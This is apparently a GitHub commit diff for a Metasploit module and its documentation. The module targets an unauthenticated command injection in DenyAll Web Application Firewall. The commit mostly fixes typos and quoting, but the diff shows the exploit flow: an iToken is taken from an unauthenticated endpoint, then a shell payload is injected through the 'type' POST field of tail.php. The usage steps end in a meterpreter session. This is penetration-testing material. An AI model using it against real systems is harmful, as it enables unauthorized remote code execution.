Skip to content

Commit 3d543b7

Browse files
committed
Fixing typos and replacing double quotes with single
1 parent 1031d79 commit 3d543b7

File tree

2 files changed

+21
-11
lines changed

2 files changed

+21
-11
lines changed

documentation/modules/exploit/linux/http/denyall_waf_exec.md

Lines changed: 14 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,8 +1,6 @@
11
## Vulnerable Application
22

3-
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
4-
5-
**Vulnerable Application Installation Steps**
3+
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
64

75
It's possible to have trial demo for 15 days at Amazon Marketplace.
86
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
@@ -13,6 +11,18 @@ You just need to follow instruction above URL.
1311

1412
A successful check of the exploit will look like this:
1513

14+
- [ ] Start `msfconsole`
15+
- [ ] `use use exploit/linux/http/denyall_exec`
16+
- [ ] Set `RHOST`
17+
- [ ] Set `LHOST`
18+
- [ ] Run `check`
19+
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
20+
- [ ] Run `exploit`
21+
- [ ] **Verify** that you are seeing `iToken` value extraction.
22+
- [ ] **Verify** that you are getting `meterpreter` session.
23+
24+
## Scenarios
25+
1626
```
1727
msf > use exploit/linux/http/denyall_exec
1828
msf exploit(denyall_exec) >
@@ -34,4 +44,4 @@ msf exploit(denyall_exec) > exploit
3444
meterpreter > pwd
3545
/var/log/denyall/reverseproxy
3646
meterpreter >
37-
```
47+
```

modules/exploits/linux/http/denyall_waf_exec.rb

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@ def initialize(info={})
1212
super(update_info(info,
1313
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
1414
'Description' => %q{
15-
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
15+
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
1616
terminal command under the context of the web server user.
1717
},
1818
'License' => MSF_LICENSE,
@@ -40,7 +40,7 @@ def initialize(info={})
4040

4141
register_options(
4242
[
43-
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Denyall WAF', '/'])
43+
OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
4444
]
4545
)
4646
end
@@ -51,8 +51,8 @@ def get_token
5151
'method' => 'GET',
5252
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
5353
'vars_get' => {
54-
'applianceUid' => "LOCALUID",
55-
'typeOf' => "debug"
54+
'applianceUid' => 'LOCALUID',
55+
'typeOf' => 'debug'
5656
}
5757
})
5858

@@ -75,7 +75,7 @@ def check
7575

7676
def exploit
7777
# Get iToken from unauthenticated accessible endpoint
78-
print_status("Extracting iToken value")
78+
print_status('Extracting iToken value')
7979
token = get_token
8080

8181
if token.nil?
@@ -85,15 +85,15 @@ def exploit
8585
end
8686

8787
# Accessing to the vulnerable second endpoint where we have command injection with valid iToken
88-
print_status("Trigerring command injection vulnerability with iToken value.")
88+
print_status('Trigerring command injection vulnerability with iToken value.')
8989
r = rand_text_alpha(5 + rand(3));
9090

9191
send_request_cgi({
9292
'method' => 'POST',
9393
'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
9494
'vars_post' => {
9595
'iToken' => token,
96-
'tag' => "tunnel",
96+
'tag' => 'tunnel',
9797
'stime' => r,
9898
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
9999
}

0 commit comments

Comments
 (0)